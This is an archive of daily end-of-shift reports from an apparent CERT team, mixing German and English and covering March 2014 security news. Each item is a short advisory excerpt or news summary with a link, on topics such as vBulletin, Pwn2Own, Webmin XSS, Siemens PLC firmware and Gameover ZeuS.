======================= = End-of-Shift report = ======================= Timeframe: Freitag 14-03-2014 18:00 − Montag 17-03-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Security Exploit Patched on vBulletin - PHP Object Injection *** --------------------------------------------- The vBulletin team just issued a warning, and released patches for a security exploit that affected all versions of vBulletin including 3.5, 3.6, 3.7, 3.8, 4.X, 5.X. They recommend that anyone using vBulletin apply these patches as soon as possible. Here is part of their announcement: A security issue has been found that affects all... --------------------------------------------- http://blog.sucuri.net/2014/03/security-exploit-patched-on-vbulletin-php-ob… *** Pwn2Own results for Wednesday (Day One) *** --------------------------------------------- At Pwn4Fun, Google delivered a very impressive exploit against Apple Safari launching Calculator as root on Mac OS X. ZDI presented a multi-stage exploit, including an adaptable sandbox bypass, against Microsoft Internet Explorer, launching Scientific Calculator (running in medium integrity) with continuation. --------------------------------------------- http://www.pwn2own.com/2014/03/pwn2own-results-for-wednesday-day-one/ *** Pwn2Own results for Thursday (Day Two) *** --------------------------------------------- ... Vulnerabilities were successfully presented on Thursday in the Pwn2Own competition ... against Google Chrome, Microsoft Internet Explorer, Apple Safari, Mozilla Firefox, Adobe Flash. --------------------------------------------- http://www.pwn2own.com/2014/03/pwn2own-results-thursday-day-two/ *** Verschlüsselung: Caesar-Wettbewerb sucht authentifizierte Verschlüsselung *** --------------------------------------------- Die erste Runde des Caesar-Wettbewerbs hat begonnen. Das Ziel: Kryptografen suchen bessere Algorithmen für authentifizierte Verschlüsselung. --------------------------------------------- http://www.golem.de/news/verschluesselung-caesar-wettbewerb-sucht-authentif… *** The Long Tail of ColdFusion Fail *** --------------------------------------------- Earlier this month, I published a story about a criminal hacking gang using Adobe ColdFusion vulnerabilities to build a botnet of hacked e-commerce sites that were milked for customer credit card data. Todays post examines the impact that this botnet has had on several businesses, as well as the important and costly lessons these companies learned from the intrusions. --------------------------------------------- http://krebsonsecurity.com/2014/03/the-long-tail-of-coldfusion-fail/ *** Webstorage-App von Asus schwächelt erneut bei SSL *** --------------------------------------------- Eine eigentlich behobene SSL-Lücke in der Android-App für den Asus-Onlinespeicher Webstorage ist auferstanden: Die aktuelle App-Version überpüft nicht das vom Onlinespeicher übermittelte Serverzertifikat. --------------------------------------------- http://www.heise.de/security/meldung/Webstorage-App-von-Asus-schwaechelt-er… *** iOS 7 has weak random number generator *** --------------------------------------------- Trivial to break, says researcher In an effort to improve iDevice security, Apple replaced its internal random number generator between iOS 6 and iOS 7 - but a security researcher believes Cupertino inadvertently downgraded security. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/03/16/ios_7_has_w… *** VU#381692: Webmin contains a cross-site scripting vulnerability *** --------------------------------------------- Vulnerability Note VU#381692 Webmin contains a cross-site scripting vulnerability Original Release date: 14 Mar 2014 | Last revised: 14 Mar 2014 Overview Webmin 1.670, and possibly earlier versions, contains a cross-site scripting vulnerability. Description CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) Webmin 1.670, and possibly earlier versions, contains a cross-site scripting vulnerability in the "search" parameter of the view.cgi... --------------------------------------------- http://www.kb.cert.org/vuls/id/381692 *** Siemens SIMATIC S7-1500 CPU Firmware Vulnerabilities *** --------------------------------------------- Siemens and Positive Technology researchers (Yury Goltsev, Llya Karpov, Alexey Osipov, Dmitry Serebryannikov and Alex Timorin) have identified nine firmware vulnerabilities in the Siemens SIMATIC S7-1500 CPU Firmware. Siemens has produced a patch that mitigates these vulnerabilities.These vulnerabilities could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-073-01 *** OpenX 2.8.11 Cross Site Request Forgery *** --------------------------------------------- Topic: OpenX 2.8.11 Cross Site Request Forgery Risk: Low Text: Hello, Multiple cross-site request forgery (CSRF) vulnerabilities in OpenX 2.8.11and earlier allows remote attackers to ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030121 *** iOS 7 Arbitrary Code Execution *** --------------------------------------------- When a specific value is supplied in USB Endpoint descriptor for a HID device the Apple device kernel panics and reboots --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030126 *** GNU Readline Insecure usage of temporary files *** --------------------------------------------- Topic: GNU Readline Insecure usage of temporary files Risk: Medium Text: Whilst auditing some code for insecure uses of temporary files I spotted a potential area of concern in GNU readline. (... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030129 *** HPSBNS02969 rev.1 - HP NonStop Servers running Java 7, Multiple Remote Vulnerabilities affecting Confidentiality, Integrity and Availability *** --------------------------------------------- Potential vulnerabilities have been identified with HP NonStop Servers running Java 7. The vulnerabilities could be exploited remotely affecting confidentiality, integrity and availability. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…

1 0

Tageszusammenfassung - Freitag 14-03-2014
by Daily end-of-shift report 14 Mar '14

14 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 13-03-2014 18:00 − Freitag 14-03-2014 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Bugtraq: [ MDVSA-2014:057 ] mediawiki *** --------------------------------------------- Updated mediawiki packages fix multiple vulnerabilities: --------------------------------------------- http://www.securityfocus.com/archive/1/531452 *** Vuln: Mutt Mailreader mutt_copy_hdr() Function Heap Based Buffer Overflow Vulnerability *** --------------------------------------------- Mutt mailreader is prone to a heap-based buffer-overflow vulnerability. Successful exploitation of this issue allow an attacker to execute arbitrary code in the context of the application, failed attempts lead to denial-of-service. Mutt prior to 1.5.23 are vulnerable. --------------------------------------------- http://www.securityfocus.com/bid/66165 *** Schneider Electric StruxureWare SCADA Expert ClearSCADA Parsing Vulnerability *** --------------------------------------------- OVERVIEW Andrew Brooks identified and reported to The Zero Day Initiative (ZDI) a File Parsing Vulnerability: Schneider Electric StruxureWare SCADA Expert ClearSCADA ServerMain.exe OPF File Parsing Vulnerability. Schneider Electric has prepared workarounds and helped develop security upgrades for a third‑party component that is affected.AFFECTED PRODUCTSThe following SCADA Expert ClearSCADA versions are affected: --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-072-01 *** VU#807134: WatchGuard Fireware XTM devices contain a cross-site scripting vulnerability *** --------------------------------------------- Vulnerability Note VU#807134 WatchGuard Fireware XTM devices contain a cross-site scripting vulnerability ... Overview WatchGuard Fireware XTM 11.8.1, and possibly earlier versions, contains a cross-site scripting vulnerability. --------------------------------------------- http://www.kb.cert.org/vuls/id/807134 *** Squid Flaw in SSL-Bump Lets Remote Users Deny Service *** --------------------------------------------- A remote user can send HTTPS requests to trigger a flaw in SSL-Bump and cause the target service to crash. Specially crafted requests are not required to trigger this vulnerability. --------------------------------------------- http://www.securitytracker.com/id/1029908 *** Wireshark NFS/M3UA/RLC Dissector Bugs Let Remote Users Deny Service and MPEG Buffer Overflow Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- Several vulnerabilities were reported in Wireshark. A remote user can cause arbitrary code to be executed on the target user's system. A remote user can cause denial of service conditions. --------------------------------------------- http://www.securitytracker.com/id/1029907 *** Blogs of War: Don’t Be Cannon Fodder *** --------------------------------------------- On Wednesday, KrebsOnSecurity was hit with a fairly large attack which leveraged a feature in more than 42,000 blogs running the popular WordPress content management system (this blog runs on WordPress). This post is an effort to spread the word to other WordPress users to ensure their blogs arent used in attacks going forward. --------------------------------------------- http://feedproxy.google.com/~r/KrebsOnSecurity/~3/TMHH3NsEOxo/ *** Cisco Cloud Portal Discloses Cryptographic Material That Lets Remote Users Decrypt Data *** --------------------------------------------- A vulnerability was reported in Cisco Cloud Portal. A local user can obtain cryptographic material. A remote user with access to the cryptographic material can then decrypt data. The Cisco Intelligent Automation for Cloud (Cisco IAC) binaries include fixed cryptographic material. A remote user that can access encrypted data from the target Cisco IAC installation can decrypt the data. --------------------------------------------- http://www.securitytracker.com/id/1029915 *** Google Docs Users Targeted by Sophisticated Phishing Scam *** --------------------------------------------- We see millions of phishing messages every day, but recently, one stood out: a sophisticated scam targeting Google Docs and Google Drive users.The scam uses a simple subject of "Documents" and urges the recipient to view an important document on Google Docs by clicking on the included link.read more --------------------------------------------- http://www.symantec.com/connect/blogs/google-docs-users-targeted-sophistica… *** McAfee Email Gateway Input Validation Flaws Let Remote Authenticated Users Inject SQL and Operating System Commands *** --------------------------------------------- Several vulnerabilities were reported in McAfee Email Gateway. A remote authenticated user can execute arbitrary operating system commands on the target system. A remote authenticated user can inject SQL commands. --------------------------------------------- http://www.securitytracker.com/id/1029916 *** Firefox Exec Shellcode From Privileged Javascript Shell *** --------------------------------------------- Topic: Firefox Exec Shellcode From Privileged Javascript Shell Risk: Medium --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030113 *** A decade of securing Europe’s cyber future. The EU’s cyber security Agency ENISA is turning ten, and is looking at future challenges. *** --------------------------------------------- In the “eternal marathon” against cyber criminals, there is a “constant, increasing need for ENISA”. --------------------------------------------- http://www.enisa.europa.eu/media/press-releases/a-decade-of-securing-europe… *** lighttpd Directory Traversal and SQL Injection Vulnerabilities *** --------------------------------------------- Two vulnerabilities have been reported in lighttpd, which can be exploited by malicious people to disclose potentially sensitive information and conduct SQL injection attacks. ... Successful exploitation requires mod_evhost and/or mod_simple_vhost modules to be enabled. --------------------------------------------- https://secunia.com/advisories/57333 *** Samsung Backdoor May Not Be as Wide Open as Initially Thought *** --------------------------------------------- ... As demonstrated in a proof-of-concept attack, this allowed certain baseband code to gain access to a device’s storage under a specific set of circumstances. But upon closer inspection, this backdoor is most likely not as bad as it was initially made out to be. --------------------------------------------- http://www.xda-developers.com/android/samsung-backdoor-may-not-be-as-wide-o… *** EU-Parlament stimmt für Meldepflicht von Cyberangriffen *** --------------------------------------------- Die Abgeordneten haben mit großer Mehrheit, aber einigen Änderungen einen Richtlinienentwurf der EU-Kommission zur Netz- und Informationssicherheit beschlossen. Mitgliedsländer sollen ihre Kooperationen stärken. --------------------------------------------- http://www.heise.de/newsticker/meldung/EU-Parlament-stimmt-fuer-Meldepflich… *** Gameover ZeuS Jumps on the Bitcoin Bandwagon *** --------------------------------------------- Were always asking our analysts the following question: seen anything interesting? And yesterday, the answer to our query was this: Gameover ZeuS has some additional strings.Very interesting, indeed.Heres a screenshot of the decrypted strings: • aBitcoinQt_exe • aBitcoind_exe • aWallet_dat • aBitcoinWallet • aBitcoinWalle_0Bitcoin wallet stealing has really moved up from the bush leagues. Gameover ZeuS is a pro.Analysis is ongoing.Heres the SHA1: --------------------------------------------- http://www.f-secure.com/weblog/archives/00002685.html *** Target staff IGNORED security alerts as hackers slurped 40m customers card details *** --------------------------------------------- Reports say staff dithered while hackers went to town Staff at US retailer Target failed to stop the theft of 40 million credit card records last December despite an escalating series of alarms from the companys security systems.… --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/03/14/target_fail… *** Debian Security Advisory DSA-2879-1 libssh -- security update *** --------------------------------------------- It was discovered that libssh, a tiny C SSH library, did not reset the state of the PRNG after accepting a connection. A server mode application that forks itself to handle incoming connections could see its children sharing the same PRNG state, resulting in a cryptographic weakness and possibly the recovery of the private key. --------------------------------------------- http://www.debian.org/security/2014/dsa-2879 *** Sophos UTM TCP Stack Memory Leak Denial of Service Vulnerability *** --------------------------------------------- A vulnerability has been reported in Sophos UTM, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error within TCP stack and can be exploited to cause a memory leak. The vulnerability is reported in versions prior to 9.109. --------------------------------------------- https://secunia.com/advisories/57344 *** Blog: Analysis of, Malware from the MtGox leak archive *** --------------------------------------------- A few days ago the personal blog and Reddit account of MTgox CEO, Mark Karpeles, were hacked. Attackers used them to post a file, MtGox2014Leak.zip, which they claim contains valuable database dumps and specialized software for remote access to MtGox data. But this application is actually malware created to search and steal Bitcoin wallet files from their victims. It seems that the whole leak was invented to infect computers with Bitcoin-stealer malware that takes advantage of people keen interest in the MtGox topic. --------------------------------------------- http://www.securelist.com/en/blog/8196/Analysis_of_Malware_from_the_MtGox_l…

1 0

Tageszusammenfassung - Donnerstag 13-03-2014
by Daily end-of-shift report 13 Mar '14

13 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 12-03-2014 18:00 − Donnerstag 13-03-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Decoding Domain Generation Algorithms (DGAs) Part III - ZeusBot DGA Reproduction *** --------------------------------------------- At this point, you can go ahead and close the two parent processes (since we are not interested in their functionality, for the sake of simply finding the DGA). So we know that we are interested in discovering how this traffic is generated. So let's try to find out where it originates. Earlier, using API Monitor, we saw that explorer was using several functions within WinINet.dll:... --------------------------------------------- http://vrt-blog.snort.org/2014/03/decoding-domain-generation-algorithms.html *** F-Secure im Interview: "Wir erkennen Staatstrojaner und wollen das nicht ändern" *** --------------------------------------------- Von Regierungen erstellte Malware muss nicht immer so schlecht sein wie 0zapftis, der bayerische Staatstrojaner. Für F-Secures Virenforscher Mikko Hypponen ist entscheidend, dass Anti-Malwareunternehmen auch künftig uneingeschränkt arbeiten können, wie er im Gespräch mit Golem.de sagte. --------------------------------------------- http://www.golem.de/news/f-secure-im-interview-wir-erkennen-staatstrojaner-… *** WordPress XML-RPC PingBack Vulnerability Analysis *** --------------------------------------------- There were news stories this week outlining how attackers are abusing the XML-PRC "pingback" feature of WordPress blog sites to launch DDoS attacks on other sites. This blog post will provide some analysis on this attack and additional information for websites to protect themselves. Not A New Vulnerabilty The vulnerability in WordPresss XML-RPC API is not new. Here is data from the WordPress bug tracker from 7 years ago. While the vulnerability itself is not new,... --------------------------------------------- http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/MklfK5l9jYY/wordpress-… *** A Detailed Examination of the Siesta Campaign *** --------------------------------------------- Executive Summary FireEye recently looked deeper into the activity discussed in TrendMicro's blog and dubbed the "Siesta" campaign. The tools, modus operandi, and infrastructure used in the campaign present two possibilities: either the Chinese cyber-espionage unit APT1 is perpetrating this... --------------------------------------------- http://www.fireeye.com/blog/technical/targeted-attack/2014/03/a-detailed-ex… *** LightsOut EK Targets Energy Sector *** --------------------------------------------- Late last year, the story broke that threat actors were targeting the energy sector with Remote Access Tools and Intelligence gathering malware. It would seem that the attackers responsible for this threat are back for more. This particular APT struck late February between 2/24-2/26. The attack began as a compromise of a third party law firm which includes an energy law practice known as --------------------------------------------- http://feedproxy.google.com/~r/zscaler/research/~3/S2HhvPupa_0/lightsout-ek… *** Trojan.Skimer.19 threatens banks *** --------------------------------------------- March 4, 2014 Malware infecting the electronic innards of ATMs is not exactly a common phenomenon, so whenever such new kinds of programs emerge, they inevitably draw the attention of security specialists. Doctor Webs virus analysts got hold of a sample of Trojan.Skimer.19 which can infect ATMs. According to Doctor Web, banking system attacks involving Trojan.Skimer.19 persist to this day. Similar to its predecessors, the Trojan has its main payload incorporated into a dynamic link library... --------------------------------------------- http://news.drweb.com/show/?i=4267&lng=en&c=9 *** Trojan.Rbrute hacks Wi-Fi routers *** --------------------------------------------- March 5, 2014 Doctor Webs security researchers examined Trojan.Rbrute malware, which is designed to crack Wi-Fi router access passwords using brute force and change the DNS server addresses specified in the configuration of these devices. Criminals use this malicious program to spread the file infector known as Win32.Sector. When launched on a Windows computer, Trojan.Rbrute establishes a connection with the remote server and stands by for instructions. One of them provides the Trojan with a... --------------------------------------------- http://news.drweb.com/show/?i=4271&lng=en&c=9 *** Anatomy of a Control Panel Malware Attack, Part 1 *** --------------------------------------------- Recently we've discussed how Control Panel (CPL) malware has been spreading in Latin America. In the past, we've analyzed in some detail how CPL malware works as well as the overall picture of how this threat spreads. In this post, we shall examine in detail how they spread, and how they relate with other malicious sites. --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/v3D2zLGXolU/ *** Ethical hacker backer hacked, warns of email ransack *** --------------------------------------------- Switches registrars, tightens security after upsetting incident The IT security certification body that runs the Certified Ethical Hacker programme has itself been hacked. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/03/13/ethical_hac… *** Samsung: Galaxy-Geräte haben eine Backdoor im Modem-Prozessor *** --------------------------------------------- In mehreren Smartphones und Tablets aus Samsungs Galaxy-Modellreihe wurde eine Backdoor im Modem-Prozessor entdeckt. Diese könnte von Angreifern dazu verwendet werden, auf die Daten auf dem Smartphone oder Tablet zuzugreifen oder auch Daten zu verändern, um so Schadsoftware zu verbreiten. (Smartphone, Samsung) --------------------------------------------- http://www.golem.de/news/samsung-galaxy-geraete-haben-eine-backdoor-im-mode… *** Google hackt Mac OS X für den guten Zweck *** --------------------------------------------- Das Sicherheitsteam des Suchmaschinen-Riesen hat einen brisanten Angriff auf Mac OS X demonstriert: Beim Aufruf einer Webseite mit Safari wurde Code als root ausgeführt. Das Schau-Hacken fand in einer neuen Kategorie des Wettbewerbs Pwn2Own statt. --------------------------------------------- http://www.heise.de/security/meldung/Google-hackt-Mac-OS-X-fuer-den-guten-Z… *** Metasploit Weekly Update: Theres a Bug In Your Brain *** --------------------------------------------- The most fun module this week, in my humble opinion, is from Rapid7's own Javascript Dementer, Joe Vennix. Joe wrote up this crafty implementation of a Safari User-Assisted Download and Run Attack, which is not technically a vulnerability or a bug or anything -- it's a feature that ends up being a kind of a huge risk. Here's how it goes:... --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/03/13/metasploi… *** TCIPG Seminar: Dynamic Data Attacks on Real-Time Power System Operations *** --------------------------------------------- With increasing dependence on modern information and communication technology, a future smart grid is potentially more vulnerable to coordinated cyber attacks launched by an adversary. In this talk, we consider several possible attack mechanisms aimed at disrupting real-time operations of a power grid. In particular, we are interested in dynamic attack strategies on the power system state estimation that lead to infeasible real-time dispatch and disrupt the real-time market operation. --------------------------------------------- http://tcipg.org/news/TCIPG-Seminar-2014-Mar-7-Tong *** Security update available for Adobe Shockwave Player *** --------------------------------------------- Adobe has released a security update for Adobe Shockwave Player 12.0.9.149 and earlier versions on the Windows and Macintosh operating systems. This update addresses a critical vulnerability that could potentially allow an attacker to remotely take control of the affected system. --------------------------------------------- http://helpx.adobe.com/security/products/shockwave/apsb14-10.html *** Security Bulletin: Multiple security vulnerabilities exist in IBM InfoSphere Information Server (CVE-2013-4057, CVE-2013-4058 and CVE-2013-4059) *** --------------------------------------------- Security vulnerabilities exist in various versions of IBM InfoSphere Information Server or constituent products. See the individual descriptions for details. CVE(s): CVE-2013-4057, CVE-2013-4058, and CVE-2013-4059 Affected product(s) and affected version(s): IBM InfoSphere Information Server Versions 8.0, 8.1, 8.5, 8.7, and 9.1 running on all platforms --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul… *** Bugtraq: PowerArchiver: Uses insecure legacy PKZIP encryption when AES is selected (CVE-2014-2319) *** --------------------------------------------- http://www.securityfocus.com/archive/1/531440 *** SA-CONTRIB-2014-031 - Webform Template - Access Bypass *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-031Project: Webform Template (third-party module)Version: 7.xDate: 2014-March-12Security risk: Less criticalExploitable from: RemoteVulnerability: Access BypassDescriptionThis module enables you to copy webform config from one node to another.The module doesnt respect node access when providing possible nodes to copy from. As a result, a user may be disclosed the titles of nodes he does not have view access to and as such he may be able to copy the webform... --------------------------------------------- https://drupal.org/node/2216607 *** SA-CONTRIB-2014-030 - SexyBookmarks - Information Disclosure *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-030Project: SexyBookmarks (third-party module)Version: 6.xDate: 2014-March-12Security risk: Moderately criticalExploitable from: RemoteVulnerability: Information DisclosureDescriptionThe SexyBookmarks module is a port of the WordPress SexyBookmarks plug-in. The module adds social bookmarking using the Shareaholic service.The module discloses the private files location when Drupal 6 is configured to use private files.This vulnerability is mitigated by the fact... --------------------------------------------- https://drupal.org/node/2216269 *** Mitsubishi Electric Automation MC-WorX Suite Unsecure ActiveX Control *** --------------------------------------------- This advisory is a follow-up to the original alert, titled ICS-ALERT-13-259-01 Mitsubishi MC-WorX Suite Unsecure ActiveX Control,a published September 16, 2013, on the NCCIC/ICS‑CERT web site (this was originally incorrectly identified as MC-WorkX, the correct product name is MC-WorX). --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-051-02 *** Cisco Intelligent Automation for Cloud Cryptographic Implementation Issues *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** GNUpanel 0.3.5_R4 Cross Site Request Forgery / Cross Site Scripting *** --------------------------------------------- Topic: GNUpanel 0.3.5_R4 Cross Site Request Forgery / Cross Site Scripting Risk: Medium Text:# Exploit Title :GNUpanel 0.3.5_R4 - Multiple Vulnerabilities # Vendor Homepage :http://wp.geeklab.com.ar/gl-en/gnupanel... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030098 *** Proxmox Mail Gateway 3.1 Cross Site Scripting *** --------------------------------------------- Topic: Proxmox Mail Gateway 3.1 Cross Site Scripting Risk: Low Text:I. VULNERABILITY - Multiplus XSS in Proxmox Mail Gateway 3.1 II. BACKGROUND - Proxmox Mail G... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030097

1 0

Tageszusammenfassung - Mittwoch 12-03-2014
by Daily end-of-shift report 12 Mar '14

12 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 11-03-2014 18:00 − Mittwoch 12-03-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** When ASLR makes the difference *** --------------------------------------------- We wrote several times in this blog about the importance of enabling Address Space Layout Randomization mitigation (ASLR) in modern software because it's a very important defense mechanism that can increase the cost of writing exploits for attackers and in some cases prevent reliable exploitation. In today's blog, we'll go through ASLR one more time to show in practice how it can be valuable to mitigate two real exploits seen in the wild and to suggest solutions for programs... --------------------------------------------- http://blogs.technet.com/b/srd/archive/2014/03/11/when-aslr-makes-the-diffe… *** Zeus-in-the-mobile variant uses security firms name to gain victims trust *** --------------------------------------------- Android users are tricked into installing a spurious "security" app, which allows fraudsters to bypass one-time password authentication for online banking. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/uCKACIRIxoI/ *** BB10s dated crypto lets snoops squeeze the juice from your BlackBerry *** --------------------------------------------- BEAST will attack your sensitive web traffic, warns poster BlackBerry BB10 OS uses dated protocols that leave users at risk to known cryptographic attacks, according to a security researcher. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/03/12/bb10_dated_… *** WhatsApp erweitert Einstellungen zur Privatsphäre und bleibt trotzdem unsicher *** --------------------------------------------- Der Schutz der Privatsphäre bleibt in WhatsApp löchrig: Zwar können andere Nutzer durch das neueste Update nicht mehr sehen, wann man zuletzt im Chat online war, aber die Chats können wohl komplett durch andere Android-Apps ausgelesen werden. --------------------------------------------- http://www.heise.de/security/meldung/WhatsApp-erweitert-Einstellungen-zur-P… *** iOS 7.1: Innenraumortung iBeacon schwerer abzustellen *** --------------------------------------------- Nach dem Update auf Apples jüngsten Mobilbetriebssystem reicht es nicht aus, eine Anwendung, die das Indoor-Tracking nutzt, zu schließen - selbst nach einem Geräteneustart funkt iBeacon fleißig weiter. --------------------------------------------- http://www.heise.de/security/meldung/iOS-7-1-Innenraumortung-iBeacon-schwer… *** Is it the ISPs Fault if Your Home Broadband Router Gets Hacked? *** --------------------------------------------- As consumers we have a right to be huffy at our ISPs when something goes wrong. But is the Internet provider still to blame if, as in the recent cases of AAISP and now PlusNet, your home broadband router ends up being hijacked by a DNS redirection exploit? --------------------------------------------- http://www.ispreview.co.uk/index.php/2014/03/isps-fault-home-broadband-rout… *** Blog: Agent.btz: a source of inspiration? *** --------------------------------------------- The past few days has seen an extensive discussion within the IT security industry about a cyberespionage campaign called Turla, aka Snake and Uroburos, which, according to G-DATA experts, may have been created by Russian special services. --------------------------------------------- http://www.securelist.com/en/blog/8191/Agent_btz_a_source_of_inspiration *** Yokogawa CENTUM CS 3000 Vulnerabilities *** --------------------------------------------- Juan Vazquez of Rapid7 Inc.,a and independent researcher Julian Vilas Diaz have identified several buffer overflow vulnerabilities and released proof-of-concept (exploit) code for the Yokogawa CENTUM CS 3000 application. CERT/CC, NCCIC/ICS-CERT, and JPCERT have coordinated with Rapid7 and Yokogawa to mitigate these vulnerabilities. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-070-01 *** SSA-456423 (Last Update 2014-03-12): Vulnerabilities in SIMATIC S7-1500 CPU *** --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** VMSA-2014-0002 *** --------------------------------------------- VMware vSphere updates to third party libraries --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0002.html *** Apple Safari OSX code execution *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/91654 *** WordPress WP SlimStat Plugin URL Script Insertion Vulnerability *** --------------------------------------------- https://secunia.com/advisories/57305 *** Bugtraq: CORE-2014-0002 - Oracle VirtualBox 3D Acceleration Multiple Memory Corruption Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/531418 *** Vuln: MediaWiki text Prameter HTML Injection Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/65906 *** Vuln: MediaWiki CVE-2014-2242 Cross Site Scripting Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/65910 *** [webapps] - ZyXEL Router P-660HN-T1A - Login Bypass *** --------------------------------------------- http://www.exploit-db.com/exploits/32204

1 0

Tageszusammenfassung - Dienstag 11-03-2014
by Daily end-of-shift report 11 Mar '14

11 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 10-03-2014 18:00 − Dienstag 11-03-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** A clear-eyed guide to Mac OSs actual security risks *** --------------------------------------------- Apple has improved its security in recent years, but is it enough? --------------------------------------------- http://www.csoonline.com/article/749495/a-clear-eyed-guide-to-mac-os-s-actu… *** CanSecWest Presenter Self-Censors Risky Critical Infrastructure Talk *** --------------------------------------------- Researcher Eric Filiol withdrew his presentation from this weeks CanSecWest conference because of concerns the information could be used to attack critical infrastructure worldwide. --------------------------------------------- http://threatpost.com/cansecwest-presenter-self-censors-risky-critical-infr… *** More Than 162,000 WordPress Sites Used for Distributed Denial of Service Attack *** --------------------------------------------- Distributed Denial of Service (DDOS) attacks are becoming a common trend on our blog lately, and that's OK because it's a very serious issue for every website owner. Today I want to talk about a large DDOS attack that leveraged thousands of unsuspecting WordPress websites as indirect amplification vectors. Any WordPress site with XML-RPC enabled... --------------------------------------------- http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-di… *** Can this $70 dongle stem the epidemic of password breaches? *** --------------------------------------------- Maybe not, but its approach could improve the security of password databases. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/TIJ7a8DsSVY/ *** Careto and OS X Obfuscation *** --------------------------------------------- Last month, security researchers released a report about a targeted attack operation which they named Careto, or Mask in Spanish. The attack was noted for encoding its configuration data and encrypting its network traffic, making analysis more difficult. However, the capabilities of the Mac malware used in Careto was not as sophisticated as its Windows... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/tLQMNa8HgFc/ *** Saboteurs slip Dendroid RAT into Google Play *** --------------------------------------------- Google quickly removed the malware, which was reportedly disguised as a legitimate parental control app, from its marketplace. --------------------------------------------- http://www.scmagazine.com/saboteurs-slip-dendroid-rat-into-google-play/arti… *** Ein Drittel aller Zertifikats-Herausgeber nur Security-Ballast *** --------------------------------------------- Bei einer Untersuchung von 48 Millionen SSL-Zertifikaten stellten Forscher fest, dass jeder dritte Herausgeber kein einziges HTTPS-Zertifikat ausgestellt hat. Diese Schläfer-CAs sind ein beträchtliches Sicherheitsrisiko, das man leicht entschärfen könnte. --------------------------------------------- http://www.heise.de/security/meldung/Ein-Drittel-aller-Zertifikats-Herausge… *** Download: Threat Report *** --------------------------------------------- Our Threat Report covering the second half of 2013 (with some forecasting of 2014) was released last week.Youll find it, and all of our previous reports in the Labs section of f-secure.com. On 10/03/14 At 06:24 PM --------------------------------------------- http://www.f-secure.com/weblog/archives/00002681.html *** Verschlüsselung: Snowden empfiehlt Textsecure und Redphone *** --------------------------------------------- Edward Snowden lobt in der Diskussion auf der SXSW Openwhispersystems und dessen Entwickler Moxie Marlinspike für die Veröffentlichung einfach zu nutzender Verschlüsselungstools. --------------------------------------------- http://www.golem.de/news/verschluesselung-snowden-empfiehlt-textsecure-und-… *** iOS 7.1: Apple stopft zahlreiche Sicherheitslücken *** --------------------------------------------- Mit dem jüngsten Update behebt Apple über zwei Dutzend teils kritische Fehler in seinem Mobilbetriebssystem. Ein Jailbreak ist nun nicht mehr möglich. --------------------------------------------- http://www.heise.de/security/meldung/iOS-7-1-Apple-stopft-zahlreiche-Sicher… *** Team Cymrus SOHO Pharming Whitepaper *** --------------------------------------------- UPDATE: Here is the video for our SOHO Pharming Update of March 11, 2014. This update discusses the results of our SOHO Pharming Whitepaper release as well as further developments on that topic. If youve navigated to this site from an external source and are seeking the download of the SOHO Pharming Whitepaper, please scroll down on this page. Thanks for watching and feel free to share with your colleagues and friends! --------------------------------------------- https://www.team-cymru.com/ReadingRoom/Whitepapers/SOHOPharming.html *** Microsoft Security Bulletin Summary for March 2014 *** --------------------------------------------- This bulletin summary lists security bulletins released for March 2014. With the release of the security bulletins for March 2014, this bulletin summary replaces the bulletin advance notification originally issued March 6, 2014. --------------------------------------------- http://technet.microsoft.com/en-us/security/bulletin/ms14-mar *** Security updates available for Adobe Flash Player *** --------------------------------------------- Adobe has released security updates for Adobe Flash Player 12.0.0.70 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.341 and earlier versions for Linux. These updates address important vulnerabilities, and Adobe recommends users update their product installations to the latest versions: ... --------------------------------------------- http://helpx.adobe.com/security/products/flash-player/apsb14-08.html *** TA14-069A: Microsoft Ending Support for Windows XP and Office 2003 *** --------------------------------------------- Original release 